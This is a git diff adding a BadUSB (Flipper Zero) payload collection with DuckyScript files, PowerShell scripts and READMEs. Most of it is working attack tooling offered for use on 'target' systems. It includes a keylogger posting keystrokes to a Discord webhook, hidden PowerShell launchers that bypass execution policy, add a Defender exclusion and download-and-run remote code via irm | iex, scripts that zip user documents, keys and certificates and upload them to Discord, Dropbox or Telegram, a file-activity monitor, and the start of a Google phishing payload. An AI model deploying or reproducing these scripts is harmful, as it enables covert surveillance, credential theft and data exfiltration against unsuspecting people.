Keylogger To Discord Webhook
+ + +SYNOPSIS + +This script gathers Keypress information and posts to a discord webhook address with the results only +when the keyboard is inactive for more than 10 seconds and only if keys were pressed before that. + +USAGE + +1. Input your credentials below +2. Run Script on target System +3. Check Discord for results diff --git a/Discord-Keylogger/main.ps1 b/Discord-Keylogger/main.ps1 new file mode 100644 index 0000000..4d701d9 --- /dev/null +++ b/Discord-Keylogger/main.ps1 @@ -0,0 +1,71 @@ +# Import DLL Definitions for keyboard inputs +$API = @' +[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] +public static extern short GetAsyncKeyState(int virtualKeyCode); +[DllImport("user32.dll", CharSet=CharSet.Auto)] +public static extern int GetKeyboardState(byte[] keystate); +[DllImport("user32.dll", CharSet=CharSet.Auto)] +public static extern int MapVirtualKey(uint uCode, int uMapType); +[DllImport("user32.dll", CharSet=CharSet.Auto)] +public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags); +'@ +$API = Add-Type -MemberDefinition $API -Name 'Win32' -Namespace API -PassThru + +# Add stopwatch for intellegent sending +$LastKeypressTime = [System.Diagnostics.Stopwatch]::StartNew() +$KeypressThreshold = [TimeSpan]::FromSeconds(10) + +# Start a continuous loop +While ($true){ + $keyPressed = $false + try{ + # Start a loop that checks the time since last activity before message is sent + while ($LastKeypressTime.Elapsed -lt $KeypressThreshold) { + # Start the loop with 30 ms delay between keystate check + Start-Sleep -Milliseconds 30 + for ($asc = 8; $asc -le 254; $asc++){ + # Get the key state. (is any key currently pressed) + $keyst = $API::GetAsyncKeyState($asc) + # If a key is pressed + if ($keyst -eq -32767) { + # Restart the inactivity timer + $keyPressed = $true + $LastKeypressTime.Restart() + $null = [console]::CapsLock + # Translate the keycode to a letter + $vtkey = $API::MapVirtualKey($asc, 3) + # Get the keyboard state and create stringbuilder + $kbst = New-Object Byte[] 256 + $checkkbst = $API::GetKeyboardState($kbst) + $logchar = New-Object -TypeName System.Text.StringBuilder + # Define the key that was pressed + if ($API::ToUnicode($asc, $vtkey, $kbst, $logchar, $logchar.Capacity, 0)) { + # Check for non-character keys + $LString = $logchar.ToString() + if ($asc -eq 8) {$LString = "[BKSP]"} + if ($asc -eq 13) {$LString = "[ENT]"} + if ($asc -eq 27) {$LString = "[ESC]"} + # Add the key to sending variable + $send += $LString + } + } + } + } + } + finally{ + If ($keyPressed) { + # Send the saved keys to a webhook + $escmsgsys = $send -replace '[&<>]', {$args[0].Value.Replace('&', '&').Replace('<', '<').Replace('>', '>')} + $timestamp = Get-Date -Format "dd-MM-yyyy HH:mm:ss" + $escmsg = $timestamp+" : "+'`'+$escmsgsys+'`' + $jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = $escmsg} | ConvertTo-Json + Invoke-RestMethod -Uri $dc -Method Post -ContentType "application/json" -Body $jsonsys + #Remove log file and reset inactivity check + $send = "" + $keyPressed = $false + } + } + # reset stopwatch before restarting the loop + $LastKeypressTime.Restart() + Start-Sleep -Milliseconds 10 +} diff --git a/Download-and-Execute/Download-Execute.txt b/Download-and-Execute/Download-Execute.txt new file mode 100644 index 0000000..393ace0 --- /dev/null +++ b/Download-and-Execute/Download-Execute.txt @@ -0,0 +1,22 @@ +REM Title: Download-Execute from Run Prompt +REM Author: @beigeworm | https://github.com/beigeworm +REM Description: Uses the Run Prompt to download a file and run it. +REM Target: Windows 10 + +REM *SETUP* +REM replace FILE_URL_HERE with the url of your file to run. + +REM some setup for dukie script. +DEFAULT_DELAY 100 + +REM open powershell (remove -W Hidden to show the window). +GUI r +DELAY 750 +STRING powershell -NoP -NonI -W Hidden -Exec Bypass -C cd $env:Temp;Add-MpPreference -ExclusionPath C:/;Start-Sleep 1; + +REM replace FILE_URL_HERE below. +STRING iwr -Uri FILE_URL_HERE -O upl.exe;Start-Sleep 1;Start upl.exe;exit + +CTRL-SHIFT ENTER +DELAY 3000 +ALT y diff --git a/Download-and-Execute/README.md b/Download-and-Execute/README.md new file mode 100644 index 0000000..08019e4 --- /dev/null +++ b/Download-and-Execute/README.md @@ -0,0 +1,11 @@ + +Download and Execute exe files
+ +SYNOPSIS + +Uses the Run Prompt to download a file and run it. + +USAGE + +replace FILE_URL_HERE with the url of your file to run. +Run script on target Windows system. diff --git a/Exfiltrate-to-Discord/Exfiltrate-to-Discord.txt b/Exfiltrate-to-Discord/Exfiltrate-to-Discord.txt new file mode 100644 index 0000000..ceccc3e --- /dev/null +++ b/Exfiltrate-to-Discord/Exfiltrate-to-Discord.txt @@ -0,0 +1,19 @@ + +REM Title: beigeworm's Exfiltrate files to Discord +REM Author: @beigeworm +REM Description: This script searches the users folder fot pictures, documents, logs, PDFs and more, then sends its all to a Discord Webhook. +REM Target: Windows 10 + +REM *SETUP* +REM replace WEBHOOK_HERE with your Discord Webhook. + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM open powershell (remove -W Hidden to show the window) +DELAY 1000 +GUI r +DELAY 750 +STRING powershell -NoP -Ep Bypass -W H -C $dc='WEBHOOK_HERE'; irm https://is.gd/bw_ex_to_dc | iex +ENTER + diff --git a/Exfiltrate-to-Discord/README.md b/Exfiltrate-to-Discord/README.md new file mode 100644 index 0000000..8d01ea9 --- /dev/null +++ b/Exfiltrate-to-Discord/README.md @@ -0,0 +1,12 @@ + +Exfiltrate Files to Discord
+ +SYNOPSIS + +This script searches the user folders for specific filetypes to upload to Discord zipped. + +SETUP + +Create a webhook in a discord server channel settings. +Replace WEBHOOK_HERE with your webhook. + diff --git a/Exfiltrate-to-Discord/main.ps1 b/Exfiltrate-to-Discord/main.ps1 new file mode 100644 index 0000000..df3efa2 --- /dev/null +++ b/Exfiltrate-to-Discord/main.ps1 @@ -0,0 +1,53 @@ +$hookurl = "$dc" + +Function Exfiltrate { + +param ([string[]]$FileType,[string[]]$Path) +$maxZipFileSize = 25MB +$currentZipSize = 0 +$index = 1 +$zipFilePath ="$env:temp/Loot$index.zip" + +If($Path -ne $null){ +$foldersToSearch = "$env:USERPROFILE\"+$Path +}else{ +$foldersToSearch = @("$env:USERPROFILE\Documents","$env:USERPROFILE\Desktop","$env:USERPROFILE\Downloads","$env:USERPROFILE\OneDrive","$env:USERPROFILE\Pictures","$env:USERPROFILE\Videos") +} + +If($FileType -ne $null){ +$fileExtensions = "*."+$FileType +}else { +$fileExtensions = @("*.log", "*.db", "*.txt", "*.doc", "*.pdf", "*.jpg", "*.jpeg", "*.png", "*.wdoc", "*.xdoc", "*.cer", "*.key", "*.xls", "*.xlsx", "*.cfg", "*.conf", "*.wpd", "*.rft") +} + +Add-Type -AssemblyName System.IO.Compression.FileSystem +$zipArchive = [System.IO.Compression.ZipFile]::Open($zipFilePath, 'Create') + +foreach ($folder in $foldersToSearch) { + foreach ($extension in $fileExtensions) { + $files = Get-ChildItem -Path $folder -Filter $extension -File -Recurse + foreach ($file in $files) { + $fileSize = $file.Length + if ($currentZipSize + $fileSize -gt $maxZipFileSize) { + $zipArchive.Dispose() + $currentZipSize = 0 + curl.exe -F file1=@"$zipFilePath" $hookurl + Remove-Item -Path $zipFilePath -Force + Sleep 1 + $index++ + $zipFilePath ="$env:temp/Loot$index.zip" + $zipArchive = [System.IO.Compression.ZipFile]::Open($zipFilePath, 'Create') + } + $entryName = $file.FullName.Substring($folder.Length + 1) + [System.IO.Compression.ZipFileExtensions]::CreateEntryFromFile($zipArchive, $file.FullName, $entryName) + $currentZipSize += $fileSize + } + } +} +$zipArchive.Dispose() +curl.exe -F file1=@"$zipFilePath" $hookurl +Remove-Item -Path $zipFilePath -Force +Write-Output "$env:COMPUTERNAME : Exfiltration Complete." +} + +Exfiltrate diff --git a/Exfiltrate-to-Dropbox/Exfiltrate-to-Dropbox.txt b/Exfiltrate-to-Dropbox/Exfiltrate-to-Dropbox.txt new file mode 100644 index 0000000..1d25265 --- /dev/null +++ b/Exfiltrate-to-Dropbox/Exfiltrate-to-Dropbox.txt @@ -0,0 +1,19 @@ + +REM Title: beigeworm's Exfiltrate files to Dropbox +REM Author: @beigeworm +REM Description: This script searches the users folder fot pictures, documents, logs, PDFs and more, then sends its all to a dropbox account. +REM Target: Windows 10 + +REM *SETUP* +REM replace DROPBOX_TOKEN with your Dropbox Token. + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM open powershell (remove -W Hidden to show the window) +DELAY 1000 +GUI r +DELAY 750 +STRING powershell -NoP -Ep Bypass -W H -C $db='DROPBOX_TOKEN'; irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Exfiltrate-to-Dropbox/main.ps1 | iex +ENTER + diff --git a/Exfiltrate-to-Dropbox/README.md b/Exfiltrate-to-Dropbox/README.md new file mode 100644 index 0000000..f189bdf --- /dev/null +++ b/Exfiltrate-to-Dropbox/README.md @@ -0,0 +1,19 @@ + +Exfiltrate Files to Dropbox
+ +SYNOPSIS + +Uses Powershell to Exfiltrate all files of all specified filetypes to a DropBox account. + +SETUP + +make an app at https://www.dropbox.com/developers/apps (make sure to grant full access to your new app) +generate an access token for your app and replace DROPBOX_ACCESS_TOKEN_HERE. + +USAGE + +1. Input your credentials below +2. Run Script on target System +3. Check Discord for results + +#> \ No newline at end of file diff --git a/Exfiltrate-to-Dropbox/main.ps1 b/Exfiltrate-to-Dropbox/main.ps1 new file mode 100644 index 0000000..be42638 --- /dev/null +++ b/Exfiltrate-to-Dropbox/main.ps1 @@ -0,0 +1,31 @@ +$accessToken = "$db" +$localFolderPath = "$env:USERPROFILE" + +$computerName = "$env:COMPUTERNAME" +$computerNameAsString = $computerName.ToString() +$dropboxCreateFolderUrl = "https://api.dropboxapi.com/2/files/create_folder_v2" + +$dropboxFolderPath = $computerName.ToString() +$dropboxUploadUrl = "https://content.dropboxapi.com/2/files/upload" + +$headers = @{ + "Authorization" = "Bearer $accessToken" + "Content-Type" = "application/octet-stream" +} +$body = @{ + "path" = "/$computerName" + "autorename" = $true +} | ConvertTo-Json + +$files = Get-ChildItem -Path $localFolderPath -Include "*.docx","*.txt","*.pdf","*.jpg","*.png" -Recurse + +foreach ($file in $files) { + $relativePath = $file.FullName.Replace($localFolderPath, '').TrimStart('\') + $dropboxFilePath = "$dropboxFolderPath/$relativePath".Replace('\', '/') + $headers["Dropbox-API-Arg"] = "{`"path`": `"/$dropboxFilePath`", `"mode`": `"add`", `"autorename`": true, `"mute`": false}" + try { + $fileBytes = [System.IO.File]::ReadAllBytes($file.FullName) + $response = Invoke-RestMethod -Uri $dropboxUploadUrl -Method Post -Headers $headers -Body $fileBytes + } + catch {} +} diff --git a/Exfiltrate-to-Telegram/Exfiltrate-to-Telegram.txt b/Exfiltrate-to-Telegram/Exfiltrate-to-Telegram.txt new file mode 100644 index 0000000..7de79ae --- /dev/null +++ b/Exfiltrate-to-Telegram/Exfiltrate-to-Telegram.txt @@ -0,0 +1,19 @@ + +REM Title: beigeworm's Exfiltrate files to Telegram +REM Author: @beigeworm +REM Description: This script searches the users folder fot pictures, documents, logs, PDFs and more, then sends its all to a dropbox account. +REM Target: Windows 10 + +REM *SETUP* +REM replace TELEGRAM_TOKEN with your Telegram Token. + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM open powershell (remove -W Hidden to show the window) +DELAY 1000 +GUI r +DELAY 750 +STRING powershell -NoP -Ep Bypass -W H -C $tg='TELEGRAM_TOKEN'; irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Exfiltrate-to-Telegram/main.ps1 | iex +ENTER + diff --git a/Exfiltrate-to-Telegram/README.md b/Exfiltrate-to-Telegram/README.md new file mode 100644 index 0000000..1bb93b2 --- /dev/null +++ b/Exfiltrate-to-Telegram/README.md @@ -0,0 +1,14 @@ + +Exfiltrate Files to Telegram
+ +SYNOPSIS + +This script connects target computer with a telegram chat to upload certain files to telegram . + +SETUP INSTRUCTIONS + +1. visit https://t.me/botfather and make a bot. +2. add bot api to script. +3. search for bot in top left box in telegram and start a chat then type /start. +4. Replace TELEGRAM_TOKEN with your token +5. Run Script on target System \ No newline at end of file diff --git a/Exfiltrate-to-Telegram/main.ps1 b/Exfiltrate-to-Telegram/main.ps1 new file mode 100644 index 0000000..ef5029b --- /dev/null +++ b/Exfiltrate-to-Telegram/main.ps1 @@ -0,0 +1,68 @@ +$Token = "$tg" +$URL='https://api.telegram.org/bot{0}' -f $Token + +while($chatID.length -eq 0){ +$updates = Invoke-RestMethod -Uri ($url + "/getUpdates") +if ($updates.ok -eq $true) {$latestUpdate = $updates.result[-1] +if ($latestUpdate.message -ne $null){$chatID = $latestUpdate.message.chat.id}} +Sleep 10 +} + +Function Exfiltrate { + +param ([string[]]$FileType,[string[]]$Path) +$maxZipFileSize = 50MB +$currentZipSize = 0 +$index = 1 +$zipFilePath ="$env:temp/Loot$index.zip" +$MessageToSend = New-Object psobject +$MessageToSend | Add-Member -MemberType NoteProperty -Name 'chat_id' -Value $ChatID +$MessageToSend | Add-Member -MemberType NoteProperty -Name 'text' -Value "$env:COMPUTERNAME : Exfiltration Started." -Force +irm -Method Post -Uri ($URL +'/sendMessage') -Body ($MessageToSend | ConvertTo-Json) -ContentType "application/json" + +If($Path -ne $null){ +$foldersToSearch = "$env:USERPROFILE\"+$Path +}else{ +$foldersToSearch = @("$env:USERPROFILE\Documents","$env:USERPROFILE\Desktop","$env:USERPROFILE\Downloads","$env:USERPROFILE\OneDrive","$env:USERPROFILE\Pictures","$env:USERPROFILE\Videos") +} + +If($FileType -ne $null){ +$fileExtensions = "*."+$FileType +}else { +$fileExtensions = @("*.log", "*.db", "*.txt", "*.doc", "*.pdf", "*.jpg", "*.jpeg", "*.png", "*.wdoc", "*.xdoc", "*.cer", "*.key", "*.xls", "*.xlsx", "*.cfg", "*.conf", "*.wpd", "*.rft") +} + +Add-Type -AssemblyName System.IO.Compression.FileSystem +$zipArchive = [System.IO.Compression.ZipFile]::Open($zipFilePath, 'Create') +$escmsg = "Files from : "+$env:COMPUTERNAME + +foreach ($folder in $foldersToSearch) { + foreach ($extension in $fileExtensions) { + $files = Get-ChildItem -Path $folder -Filter $extension -File -Recurse + foreach ($file in $files) { + $fileSize = $file.Length + if ($currentZipSize + $fileSize -gt $maxZipFileSize) { + $zipArchive.Dispose() + $currentZipSize = 0 + curl.exe -F chat_id="$ChatID" -F document=@"$zipFilePath" "https://api.telegram.org/bot$Token/sendDocument" + Remove-Item -Path $zipFilePath -Force + Sleep 1 + $index++ + $zipFilePath ="$env:temp/Loot$index.zip" + $zipArchive = [System.IO.Compression.ZipFile]::Open($zipFilePath, 'Create') + } + $entryName = $file.FullName.Substring($folder.Length + 1) + [System.IO.Compression.ZipFileExtensions]::CreateEntryFromFile($zipArchive, $file.FullName, $entryName) + $currentZipSize += $fileSize + } + } +} +$zipArchive.Dispose() +curl.exe -F chat_id="$ChatID" -F document=@"$zipFilePath" "https://api.telegram.org/bot$Token/sendDocument" +Remove-Item -Path $zipFilePath -Force +Write-Output "$env:COMPUTERNAME : Exfiltration Complete." +} + + +# Define What you want to search for (examples at the top) +Exfiltrate -Path documents -FileType log diff --git a/Exfiltrate-to-USB/Exfiltrate-to-USB.txt b/Exfiltrate-to-USB/Exfiltrate-to-USB.txt new file mode 100644 index 0000000..39781a8 --- /dev/null +++ b/Exfiltrate-to-USB/Exfiltrate-to-USB.txt @@ -0,0 +1,16 @@ + +REM Title: beigeworm's Exfiltrate files USB Drive +REM Author: @beigeworm +REM Description: This script searches the users folder fot pictures, documents, logs, PDFs and more, then sends its all to newly connected USB drive. +REM Target: Windows 10 + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM open powershell (remove -W Hidden to show the window) +DELAY 1000 +GUI r +DELAY 750 +STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Exfiltrate-to-USB/main.ps1 | iex +ENTER + diff --git a/Exfiltrate-to-USB/README.md b/Exfiltrate-to-USB/README.md new file mode 100644 index 0000000..21c8219 --- /dev/null +++ b/Exfiltrate-to-USB/README.md @@ -0,0 +1,15 @@ + +Exfiltrate Files to USB
+ +SYNOPSIS + +Waits for a new USB Storage device to be connected and then copies many user files to that USB drive. + +USAGE + +1. Run the script. +2. Choose if you want to hide the console window (silent mode) +3. Connect a USB Drive to the computer +4. Copying files will automatically begin to the newly connected drive +5. 'Completed' message will appear when finished (hidden mode only) + diff --git a/Exfiltrate-to-USB/main.ps1 b/Exfiltrate-to-USB/main.ps1 new file mode 100644 index 0000000..cadfe30 --- /dev/null +++ b/Exfiltrate-to-USB/main.ps1 @@ -0,0 +1,78 @@ + +[Console]::BackgroundColor = "Black" +[Console]::SetWindowSize(57, 5) +[Console]::Title = "Exfiltration" +Clear-Host + +$hidden = Read-Host "Would you like to hide this console window? (Y/N)" +$removableDrives = Get-WmiObject Win32_LogicalDisk | Where-Object { $_.DriveType -eq 2 } +$count = $removableDrives.count +$i = 10 + +While ($true){ + cls + Write-Host "Connect a Device.. ($i)" -ForegroundColor Yellow + $removableDrives = Get-WmiObject Win32_LogicalDisk | Where-Object { $_.DriveType -eq 2 } + sleep 1 + if (!($count -eq $removableDrives.count)){ + Write-Host "USB Drive Connected!" -ForegroundColor Green + break + } + $i-- + if ($i -eq 0 ){ + Write-Host "Timeout! Exiting" -ForegroundColor Red + sleep 1 + exit + } +} + +[Console]::SetWindowSize(80, 30) + +$drive = Get-WmiObject Win32_LogicalDisk | Where-Object { $_.DriveType -eq 2 } | Sort-Object -Descending | Select-Object -First 1 +$driveLetter = $drive.DeviceID +Write-Host "Loot Drive Set To : $driveLetter/" -ForegroundColor Green +$fileExtensions = @("*.log", "*.db", "*.txt", "*.doc", "*.pdf", "*.jpg", "*.jpeg", "*.png", "*.wdoc", "*.xdoc", "*.cer", "*.key", "*.xls", "*.xlsx", "*.cfg", "*.conf", "*.wpd", "*.rft") +$foldersToSearch = @("$env:USERPROFILE\Documents","$env:USERPROFILE\Desktop","$env:USERPROFILE\Downloads","$env:USERPROFILE\OneDrive","$env:USERPROFILE\Pictures","$env:USERPROFILE\Videos") +$destinationPath = "$driveLetter\$env:COMPUTERNAME`_Loot" + +if (-not (Test-Path -Path $destinationPath)) { + New-Item -ItemType Directory -Path $destinationPath -Force + Write-Host "New Folder Created : $destinationPath" -ForegroundColor Green +} + +If ($hidden -eq 'y'){ + Write-Host "Hiding the Window.." -ForegroundColor Red + sleep 1 + $Async = '[DllImport("user32.dll")] public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);' + $Type = Add-Type -MemberDefinition $Async -name Win32ShowWindowAsync -namespace Win32Functions -PassThru + $hwnd = (Get-Process -PID $pid).MainWindowHandle + if($hwnd -ne [System.IntPtr]::Zero){ + $Type::ShowWindowAsync($hwnd, 0) + } + else{ + $Host.UI.RawUI.WindowTitle = 'hideme' + $Proc = (Get-Process | Where-Object { $_.MainWindowTitle -eq 'hideme' }) + $hwnd = $Proc.MainWindowHandle + $Type::ShowWindowAsync($hwnd, 0) + } +} + +foreach ($folder in $foldersToSearch) { + Write-Host "Searching in $folder" -ForegroundColor Yellow + + foreach ($extension in $fileExtensions) { + $files = Get-ChildItem -Path $folder -Recurse -Filter $extension -File + + foreach ($file in $files) { + $destinationFile = Join-Path -Path $destinationPath -ChildPath $file.Name + Write-Host "Copying $($file.FullName) to $($destinationFile)" -ForegroundColor Gray + Copy-Item -Path $file.FullName -Destination $destinationFile -Force + } + } +} +If ($hidden -eq 'y'){ + (New-Object -ComObject Wscript.Shell).Popup("File Exfiltration Complete",5,"Exfiltration",0x0) +} +else{ + Write-Host "File Exfiltration Complete" -ForegroundColor Green +} diff --git a/File-Monitor-to-Discord/File-Changes-to-Discord.txt b/File-Monitor-to-Discord/File-Changes-to-Discord.txt new file mode 100644 index 0000000..831da7b --- /dev/null +++ b/File-Monitor-to-Discord/File-Changes-to-Discord.txt @@ -0,0 +1,20 @@ + +REM Title: beigeworm's monitor file changes to Discord Webhook. +REM Author: @beigeworm +REM Description: This script monitors any file changes in the USERPROFILE directory and posts results to a discord webhook. +REM Target: Windows 10 + +REM *SETUP* +REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook. + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM open powershell (remove -W Hidden to show the window) +DELAY 1000 +GUI r +DELAY 750 +STRING powershell -w h -NoP -Ep Bypass -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw_fm_to_dc | iex +ENTER + + diff --git a/File-Monitor-to-Discord/README.md b/File-Monitor-to-Discord/README.md new file mode 100644 index 0000000..92a7adc --- /dev/null +++ b/File-Monitor-to-Discord/README.md @@ -0,0 +1,10 @@ + +Filesystem Monitor to discord
+ +SYNOPSIS + +This script gathers information about any changes to any files in the "%USERPROFILE% folder". + +USAGE +2. Run Script on target System +3. Check temp folder for results diff --git a/File-Monitor-to-Discord/main.ps1 b/File-Monitor-to-Discord/main.ps1 new file mode 100644 index 0000000..1021f6a --- /dev/null +++ b/File-Monitor-to-Discord/main.ps1 @@ -0,0 +1,35 @@ +$whuri = "$dc" + +$watcher = New-Object System.IO.FileSystemWatcher -Property @{ + Path = $env:USERPROFILE + '\' +} +$watcher.NotifyFilter = [System.IO.NotifyFilters]::FileName -bor ` + [System.IO.NotifyFilters]::LastWrite -bor ` + [System.IO.NotifyFilters]::DirectoryName + +$action = { + $event = $EventArgs + $path = $event.FullPath + $changeType = $event.ChangeType + $timestamp = Get-Date -Format "yyyy-MM-dd HH:mm:ss" + + $msgsys = "[$timestamp] File $changeType > $path" + $escmsgsys = $msgsys -replace '[&<>]', {$args[0].Value.Replace('&', '&').Replace('<', '<').Replace('>', '>')} + $jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = $escmsgsys} | ConvertTo-Json + Invoke-RestMethod -Uri $whuri -Method Post -ContentType "application/json" -Body $jsonsys + +} + +Register-ObjectEvent -InputObject $watcher -EventName Created -Action $action +Register-ObjectEvent -InputObject $watcher -EventName Deleted -Action $action +Register-ObjectEvent -InputObject $watcher -EventName Changed -Action $action + +$watcher.EnableRaisingEvents = $true + +while ($true) { + Start-Sleep -Milliseconds 500 +} + +Unregister-Event -InputObject $watcher -EventName Created -Action $action +Unregister-Event -InputObject $watcher -EventName Deleted -Action $action +Unregister-Event -InputObject $watcher -EventName Changed -Action $action diff --git a/Filetype-Organizer/Filetype-Organizer.txt b/Filetype-Organizer/Filetype-Organizer.txt new file mode 100644 index 0000000..370d02a --- /dev/null +++ b/Filetype-Organizer/Filetype-Organizer.txt @@ -0,0 +1,16 @@ + +REM Title: Filetype Organizer +REM Author: @beigeworm +REM Description: This script searches the users folder for any files with a specific filetype and copies them to the user folder. +REM Target: Windows 10 + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM open powershell (remove -W Hidden to show the window) +DELAY 1000 +GUI r +DELAY 750 +STRING powershell -NoP -Ep Bypass -W H -C cd $env:USERPROFILE ;irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Filetype-Organizer/main.ps1 | iex +ENTER + diff --git a/Filetype-Organizer/README.md b/Filetype-Organizer/README.md new file mode 100644 index 0000000..72e161a --- /dev/null +++ b/Filetype-Organizer/README.md @@ -0,0 +1,11 @@ + +Search Folders For Filetypes
+ +SYNOPSIS + +Searches User folder for any files with specific filetype and copies them. + +USAGE + +1. Run Script. +2. follow instructions in the console. \ No newline at end of file diff --git a/Filetype-Organizer/main.ps1 b/Filetype-Organizer/main.ps1 new file mode 100644 index 0000000..65be957 --- /dev/null +++ b/Filetype-Organizer/main.ps1 @@ -0,0 +1,64 @@ + +$Host.UI.RawUI.BackgroundColor = "Black" +Clear-Host +$width = 88 +$height = 30 +[Console]::SetWindowSize($width, $height) +$windowTitle = " BeigeTools | Filetype Organizer" +[Console]::Title = $windowTitle +Write-Host "=======================================================================================" -ForegroundColor Green +Write-Host "============================= BeigeTools | Filetype Organizer =================================" -ForegroundColor Green +Write-Host "=======================================================================================`n" -ForegroundColor Green +Write-Host "More info at : https://github.com/beigeworm" -ForegroundColor DarkGray +Write-Host "Starts a GUI window to select a folder, then search for every file with a selected filetype and output to respective named files in the root folder.`n" + +# Get the directory of the script +$scriptDirectory = Split-Path -Parent $MyInvocation.MyCommand.Definition + +# Prompt user for file extensions +$fileExtensions = Read-Host "Enter file extensions separated by commas (e.g., jpg,mp4,png)" + +# Convert the input into an array +$fileExtensionsArray = $fileExtensions -split ',' + +# Prompt user for folder to search recursively +$folderPath = Read-Host "Enter the folder path to search recursively" + +# Prompt user to choose between move or copy +$operation = Read-Host "Enter 'M' to move files, 'C' to copy files" + +# Validate the user input for the operation +if ($operation -ne 'M' -and $operation -ne 'C') { + Write-Host "Invalid operation. Please enter 'M' for move or 'C' for copy." + exit +} + +# Create output folders in the script directory +foreach ($extension in $fileExtensionsArray) { + $folderName = $extension.Trim() + $folderPathForExtension = Join-Path $scriptDirectory $folderName + New-Item -ItemType Directory -Path $folderPathForExtension -Force +} + +# Search for files and move/copy to appropriate folders +foreach ($extension in $fileExtensionsArray) { + $files = Get-ChildItem -Path $folderPath -Recurse -Include "*.$extension" + + foreach ($file in $files) { + $destinationFolder = Join-Path $scriptDirectory $extension.Trim() + + if ($operation -eq 'M') { + $ind = $file.FullName + Move-Item $file.FullName -Destination $destinationFolder -Force + Write-Host "Moved : $ind" + + } elseif ($operation -eq 'C') { + $ind = $file.FullName + Copy-Item $file.FullName -Destination $destinationFolder -Force + Write-Host "Copied : $ind" + } + } +} + +Write-Host "Operation Complete." -ForegroundColor Green +pause \ No newline at end of file diff --git a/GIF-Player/Gif-Player.txt b/GIF-Player/Gif-Player.txt new file mode 100644 index 0000000..7769ab3 --- /dev/null +++ b/GIF-Player/Gif-Player.txt @@ -0,0 +1,16 @@ +REM Title: beigeworm's GIF Player. +REM Author: @beigeworm +REM Description: This script changes downlaods a rick and morty GIF and plays it in a GUI window. +REM Target: Windows 10 + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM open powershell (remove "-W H" to show the window) +DELAY 1000 +GUI r +DELAY 750 +STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/GIF-Player/main.ps1 | iex +ENTER + + diff --git a/GIF-Player/README.md b/GIF-Player/README.md new file mode 100644 index 0000000..bad8338 --- /dev/null +++ b/GIF-Player/README.md @@ -0,0 +1,10 @@ + +GIF Player in Powershell
+ +SYNOPSIS + +This Script downloads a GIF from Giphy and plays it in a GUI window. + +USAGE + +1. Run this script in powershell diff --git a/GIF-Player/main.ps1 b/GIF-Player/main.ps1 new file mode 100644 index 0000000..6c67432 --- /dev/null +++ b/GIF-Player/main.ps1 @@ -0,0 +1,45 @@ +Add-Type -AssemblyName System.Windows.Forms +Add-Type -AssemblyName System.Drawing +[System.Windows.Forms.Application]::EnableVisualStyles() + +$url = "https://media3.giphy.com/media/tJqyalvo9ahykfykAj/giphy.gif?ep=v1_gifs_search" # example GIF (replace with your own link) +$gifPath = "$env:temp/g.gif" +iwr -Uri $url -OutFile $gifPath +$ErrorActionPreference = 'Stop' + +function Play-Gif { + param( + [string]$GifPath + ) + + $form = New-Object System.Windows.Forms.Form + $pictureBox = New-Object System.Windows.Forms.PictureBox + $timer = New-Object System.Windows.Forms.Timer + + $form.Text = "GIF Player" + $form.Size = New-Object System.Drawing.Size(490, 300) + $form.StartPosition = 'CenterScreen' + $form.Topmost = $true + + $pictureBox.Size = $form.Size + $pictureBox.Image = [System.Drawing.Image]::FromFile($GifPath) + + $timer.Interval = 50 # Adjust the interval as needed for desired animation speed + $timer.Add_Tick({ + $pictureBox.Image.SelectActiveFrame([System.Drawing.Imaging.FrameDimension]::Time, $timer.Tag) + $pictureBox.Refresh() + $timer.Tag = ($timer.Tag + 1) % $pictureBox.Image.GetFrameCount([System.Drawing.Imaging.FrameDimension]::Time) + }) + + $timer.Tag = 0 + + $form.Controls.Add($pictureBox) + + $form.Add_Shown({ $timer.Start() }) + + $form.ShowDialog() +} + +Play-Gif -GifPath $gifPath +sleep 1 +Remove-Item $gifPath diff --git a/Google-Phishing/Google-Phish-to-Discord.txt b/Google-Phishing/Google-Phish-to-Discord.txt new file mode 100644 index 0000000..ec2c51a --- /dev/null +++ b/Google-Phishing/Google-Phish-to-Discord.txt @@ -0,0 +1,20 @@ + +REM Title: beigeworm's Fake Google Phishing page to Discord Webhook. +REM Author: @beigeworm +REM Description: This script makes a Fake Google Phishing page and posts results to a discord webhook. +REM Target: Windows 10 + +REM *SETUP* +REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook. + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM open powershell (remove -W Hidden to show the window) +DELAY 1000 +GUI r +DELAY 750 +STRING powershell -w h -NoP -Ep Bypass -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw_gp_to_dc | iex +ENTER + + diff --git a/Google-Phishing/README.md b/Google-Phishing/README.md new file mode 100644 index 0000000..98e1483 --- /dev/null +++ b/Google-Phishing/README.md @@ -0,0 +1,11 @@ + +Google Sign in to Discord
